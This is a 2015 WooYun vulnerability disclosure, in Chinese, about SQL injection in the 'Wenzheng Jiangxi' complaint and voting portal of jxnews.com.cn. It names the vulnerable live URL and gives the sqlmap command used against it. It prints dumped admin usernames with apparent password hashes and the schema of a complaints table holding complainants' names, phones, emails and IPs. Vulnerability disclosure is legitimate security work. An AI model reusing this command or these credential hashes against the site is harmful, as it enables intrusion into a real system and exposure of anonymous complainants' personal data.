漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-093974
漏洞标题:问政江西SQL注入点(可作用于投诉\投票\新闻)
相关厂商:jxnews.com.cn
漏洞作者: 路人甲
提交时间:2015-01-27 10:20
修复时间:2015-02-01 10:22
公开时间:2015-02-01 10:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
这个可以看到,投诉人的投诉具体信息哦~还能看到各种活动的投票数据内容.当然也有部分后台很容易找到..
详细说明:
通过这个点"http://wenz.jxnews.com.cn/ms/hyrd.php?id=6"可以看到他们数据库,其中包含一些活动投票管理,这些活动有一些全省选举之类的
百姓的一些匿名投诉管理.这个可以看到投诉人的一些信息之类的....似乎对投诉人不太妥吧
一些新闻内容...这个没啥说的
漏洞证明:
sqlmap.py -u http://wenz.jxnews.com.cn/ms/hyrd.php?id=6 --dbs
列一下部分数据内容,
数据库名是newdb2014
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0.11
Database: newdb2014
Table: wzjx_admin
[2 entries]
+----+----------+-------------------+---------------------------------------+
| id | username | usertype | password |
+----+----------+-------------------+---------------------------------------+
| 1 | admin | 1,1,1,1,1,1,1,1,1 | a31fb2a5b2f9fa038b3aef7d82087f4b_temp |
| 4 | 9ec3811e5ca57e20b51a33b3f0b78f06_temp |
+----+----------+-------------------+---------------------------------------+
一些表的字段内容
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0.11
Database: newdb2014
Table: zxjb
[31 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| app | varchar(2) |
| area | char(20) |
| areaid | int(2) |
| audit | int(2) |
| business | varchar(80) |
| businessid | int(2) |
| content | text |
| deltime | datetime |
| deltype | int(2) |
| department | varchar(80) |
| departmentid | varchar(2) |
| email | varchar(80) |
| hits | int(11) |
| id | int(20) |
| ip | char(40) |
| netname | char(40) |
| ordertag | int(2) |
| phone | char(20) |
| port | char(20) |
| qqnumber | char(20) |
| qtype | char(20) |
| qtypeid | tinyint(2) |
| realname | char(20) |
| reply | int(2) |
| sendtime | datetime |
| serverport | int(8) |
| title | varchar(400) |
| titletag | char(40) |
| titletag1 | varchar(80) |
| type | int(2) |
| viewurl | varchar(80) |
+--------------+--------------+
修复方案:
做过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-01 10:22
厂商回复:
最新状态:
暂无